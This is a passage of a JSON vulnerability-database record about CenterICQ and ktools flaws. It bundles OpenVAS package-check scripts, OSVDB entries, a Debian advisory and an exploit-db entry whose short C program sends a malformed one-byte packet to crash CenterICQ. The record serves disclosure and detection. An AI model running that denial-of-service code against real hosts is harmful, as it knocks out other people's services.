the Internet.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55942", "id": "OPENVAS:55942", "title": "Debian Security Advisory DSA 912-1 (centericq)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_912_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 912-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 4.20.0-1sarge3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 4.21.0-4.\n\nWe recommend that you upgrade your centericq package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20912-1\";\ntag_summary = \"The remote host is missing an update to centericq\nannounced via advisory DSA 912-1.\n\nWernfried Haas discovered that centericq, a text-mode multi-protocol\ninstant messenger client, can crash when it receives certain zero\nlength packets and is directly connected to the Internet.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody1.\";\n\n\nif(description)\n{\n script_id(55942);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:07:13 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15649);\n script_cve_id(\"CVE-2005-3694\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 912-1 (centericq)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"centericq\", ver:\"4.5.1-1.1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq\", ver:\"4.20.0-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq-common\", ver:\"4.20.0-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq-fribidi\", ver:\"4.20.0-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq-utf8\", ver:\"4.20.0-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update to motor\nannounced via advisory DSA 1083-1.\n\nMehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in motor, an integrated development\nenvironment for C, C++ and Java, which may lead local attackers to\nexecute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.2.2-2woody1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56853", "id": "OPENVAS:56853", "title": "Debian Security Advisory DSA 1083-1 (motor)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1083_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1083-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 3.4.0-2sarge1.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.4.0-6.\n\nWe recommend that you upgrade your motor package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201083-1\";\ntag_summary = \"The remote host is missing an update to motor\nannounced via advisory DSA 1083-1.\n\nMehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in motor, an integrated development\nenvironment for C, C++ and Java, which may lead local attackers to\nexecute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.2.2-2woody1.\";\n\n\nif(description)\n{\n script_id(56853);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15600);\n script_cve_id(\"CVE-2005-3863\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1083-1 (motor)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"motor\", ver:\"3.2.2-2woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"motor-common\", ver:\"3.4.0-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"motor\", ver:\"3.4.0-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"motor-fribidi\", ver:\"3.4.0-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:50", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-27.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57877", "id": "OPENVAS:57877", "title": "Gentoo Security Advisory GLSA 200608-27 (motor)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Motor uses a vulnerable ktools library, which could lead to the execution\nof arbitrary code.\";\ntag_solution = \"All Motor 3.3.x users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/motor-3.3.0-r1'\n\nAll motor 3.4.x users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/motor-3.4.0-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-27\nhttp://bugs.gentoo.org/show_bug.cgi?id=135020\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-27.\";\n\n \n\nif(description)\n{\n script_id(57877);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-3863\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200608-27 (motor)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-util/motor\", unaffected: make_list(\"rge 3.3.0-r1\", \"ge 3.4.0-r1\"), vulnerable: make_list(\"lt 3.4.0-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update to centericq\nannounced via advisory DSA 1088-1.\n\nMehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in centericq, a text-mode multi-protocol\ninstant messenger client, which may lead local or remote attackers to\nexecute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56858", "id": "OPENVAS:56858", "title": "Debian Security Advisory DSA 1088-1 (centericq)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1088_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1088-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 4.20.0-1sarge4.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 4.21.0-6.\n\nWe recommend that you upgrade your centericq package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201088-1\";\ntag_summary = \"The remote host is missing an update to centericq\nannounced via advisory DSA 1088-1.\n\nMehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in centericq, a text-mode multi-protocol\ninstant messenger client, which may lead local or remote attackers to\nexecute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody2.\";\n\n\nif(description)\n{\n script_id(56858);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-3863\");\n script_bugtraq_id(15600);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1088-1 (centericq)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"centericq\", ver:\"4.5.1-1.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq\", ver:\"4.20.0-1sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq-common\", ver:\"4.20.0-1sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq-fribidi\", ver:\"4.20.0-1sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"centericq-utf8\", ver:\"4.20.0-1sarge4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "description": "## Vulnerability Description\nCentericq contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends a zero length packet to the Centericq client, and will result in loss of availability for Centericq.\n## Technical Description\nIn order for the software to be vulnerable the option \"enable peer-to-peer communications\" must be enabled. (default setting)\n## Solution Description\nUpgrade to version 4.21.0-r1 or higher, as it has been reported to fix this vulnerability. In addition, various Linux distributions have released patches for some older versions.\n## Short Description\nCentericq contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends a zero length packet to the Centericq client, and will result in loss of availability for Centericq.\n## References:\nVendor URL: http://thekonst.net/en/centericq\n[Secunia Advisory ID:17798](https://secuniaresearch.flexerasoftware.com/advisories/17798/)\n[Secunia Advisory ID:17818](https://secuniaresearch.flexerasoftware.com/advisories/17818/)\n[Secunia Advisory ID:18081](https://secuniaresearch.flexerasoftware.com/advisories/18081/)\nOther Advisory URL: http://www.debian.org/security/2005/dsa-912\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200512-11.xml\nISS X-Force ID: 23327\n[CVE-2005-3694](https://vulners.com/cve/CVE-2005-3694)\n", "modified": "2005-11-30T09:33:17", "published": "2005-11-30T09:33:17", "href": "https://vulners.com/osvdb/OSVDB:21270", "id": "OSVDB:21270", "title": "Centericq Zero Length Packet Remote DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in ktools. The 'VGETSTRING()' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a malicious user can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA local overflow exists in ktools. The 'VGETSTRING()' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a malicious user can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://konst.org.ua/ktools\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1083)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1088)\n[Secunia Advisory ID:17768](https://secuniaresearch.flexerasoftware.com/advisories/17768/)\n[Secunia Advisory ID:20329](https://secuniaresearch.flexerasoftware.com/advisories/20329/)\n[Secunia Advisory ID:20446](https://secuniaresearch.flexerasoftware.com/advisories/20446/)\n[Secunia Advisory ID:23233](https://secuniaresearch.flexerasoftware.com/advisories/23233/)\n[Secunia Advisory ID:21684](https://secuniaresearch.flexerasoftware.com/advisories/21684/)\n[Secunia Advisory ID:18081](https://secuniaresearch.flexerasoftware.com/advisories/18081/)\n[Secunia Advisory ID:20368](https://secuniaresearch.flexerasoftware.com/advisories/20368/)\nOther Advisory URL: http://www.zone-h.org/en/advisories/read/id=8480/\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200512-11.xml\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200608-27.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0330.html\nKeyword: ZRCSA-200503\nISS X-Force ID: 23233\nFrSIRT Advisory: ADV-2005-2605\n[CVE-2005-3863](https://vulners.com/cve/CVE-2005-3863)\nBugtraq ID: 15600\n", "modified": "2005-11-26T08:47:58", "published": "2005-11-26T08:47:58", "href": "https://vulners.com/osvdb/OSVDB:21161", "id": "OSVDB:21161", "title": "ktools VGETSTRING Function Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T04:06:36", "bulletinFamily": "exploit", "description": "CenterICQ 4.20/4.5 Malformed Packet Handling Remote Denial of Service Vulnerability. CVE-2005-3694. Dos exploit for linux platform", "modified": "2005-11-29T00:00:00", "published": "2005-11-29T00:00:00", "id": "EDB-ID:26666", "href": "https://www.exploit-db.com/exploits/26666/", "type": "exploitdb", "title": "CenterICQ 4.20/4.5 Malformed Packet Handling Remote Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/15649/info\r\n\r\nCenterICQ is prone to a remote denial-of-service vulnerability.\r\n\r\nThe vulnerability presents itself when the client is running on a computer that is directly connected to the Internet and handles malformed packets on the listening port for ICQ messages.\r\n\r\nA successful attack can cause the client to crash. \r\n\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\n#define DEST_IP \"192.168.1.33\"\r\n#define DEST_PORT 7777\r\n\r\n main()\r\n {\r\n int sockfd;\r\n struct sockaddr_in dest_addr; // will hold the destination addr\r\n\r\n sockfd = socket(AF_INET, SOCK_STREAM, 0); // do some error checking!\r\n\r\n dest_addr.sin_family = AF_INET; // host byte order\r\n dest_addr.sin_port = htons(DEST_PORT); // short, network byte order\r\n dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);\r\n memset(&(dest_addr.sin_zero), '\\0', 8); // zero the rest of the struct\r\n\r\n // don't forget to error check the connect()!\r\n connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));\r\n\tchar *msg[] = { 0x01 };\r\n\tsend(sockfd, msg, 1, 0);\r\n}\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/26666/"}], "debian": [{"lastseen": "2019-05-30T02:22:45", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 912-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nNovember 30th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : centericq\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3694\nDebian Bug : 334089\n\nWernfried Haas discovered that centericq, a text-mode multi-protocol\ninstant messenger client, can crash when it receives certain zero\nlength packets and is directly connected to the Internet.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody1.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 4.20.0-1sarge3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 4.21.0-4.\n\nWe recommend that you upgrade your centericq package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1.dsc\n Size/MD5 checksum: 603 adc70e793721c0968ca4502ae3698e37\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1.diff.gz\n Size/MD5 checksum: 3655 582ef0aecc37162611871ae159a5a2a1\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1.orig.tar.gz\n Size/MD5 checksum: 680625 e50121ea43a54140939b7bec8efdefe0\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_alpha.deb\n Size/MD5 checksum: 868548 43f1db770fa8fe7cf8d03e7bddbc97e7\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_arm.deb\n Size/MD5 checksum: 809002 7af9b13e885f9a3e4bc2324fc74318d3\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_i386.deb\n Size/MD5 checksum: 648688 3229599d676695a14160215f39bb473d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_ia64.deb\n Size/MD5 checksum: 930848 6d54ca84f2861499702019cd50d9c351\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_hppa.deb\n Size/MD5 checksum: 821280 2ca221ccebbf2dae0ff30a198defd08b\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_m68k.deb\n Size/MD5 checksum: 611984 a1e44d2f4cd3c52700295a72dfce1868\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_mips.deb\n Size/MD5 checksum: 649002 edd2b6f73fec90e3e7142093bb3c6b3e\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_mipsel.deb\n Size/MD5 checksum: 634442 987c44dbb499ab61b7d2b254bc9ff984\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_powerpc.deb\n Size/MD5 checksum: 633166 41ab0b819882d62ec6467a4d7542ce1f\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_s390.deb\n Size/MD5 checksum: 534784 7fb270cf1f195514510aef8445b2ece6\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody1_sparc.deb\n Size/MD5 checksum: 617274 d284648d4388edddf349130e9ed13332\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3.dsc\n Size/MD5 checksum: 875 5d132cb379014c621fc81232baf9ae4f\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3.diff.gz\n Size/MD5 checksum: 106011 259f44fb98da9322ff61a6ab36df6fbc\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0.orig.tar.gz\n Size/MD5 checksum: 1796894 874165f4fbd40e3be677bdd1696cee9d\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_alpha.deb\n Size/MD5 checksum: 1650464 6757ab69461655c915f01c2ffb03e7cd\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_alpha.deb\n Size/MD5 checksum: 335886 7dcf13f17f952cc36802f7732dcf67a5\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_alpha.deb\n Size/MD5 checksum: 1651492 f3412af4c8f8310d2e21fc4155582ca8\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_alpha.deb\n Size/MD5 checksum: 1650508 9436f313af694fbe9ec97da7a168b9c4\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_amd64.deb\n Size/MD5 checksum: 1355448 6e94f8aa9438a489bd94369a1655c475\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_amd64.deb\n Size/MD5 checksum: 335908 bd7fb5325d61c02add148be10d8c2f40\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_amd64.deb\n Size/MD5 checksum: 1355704 399b6045d35c21d7d767ccc6755662e1\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_amd64.deb\n Size/MD5 checksum: 1355498 9da6bce36bfd754e09ad91d65484ba39\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_arm.deb\n Size/MD5 checksum: 2185402 598cb4714af77dda74e956a7f13c0355\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_arm.deb\n Size/MD5 checksum: 336006 4f8fd48660de8d67581aeaaf7fc26dfa\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_arm.deb\n Size/MD5 checksum: 2186270 92a29d09e5630bf9e4029811b487aadf\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_arm.deb\n Size/MD5 checksum: 2185456 38e3f614efa5f448bdae8f2fd68eb929\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_i386.deb\n Size/MD5 checksum: 1348784 6d32e6d410250dbc7a220ad8d5a563a6\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_i386.deb\n Size/MD5 checksum: 336626 7628a48c891b62253369c5f6d0fd1272\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_i386.deb\n Size/MD5 checksum: 1349606 902e8f158e71b9a21de69d586941f090\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_i386.deb\n Size/MD5 checksum: 1348864 e38a08c798ad303c66c1ef313faee73f\n\n Intel IA-64 architecture:\n\n 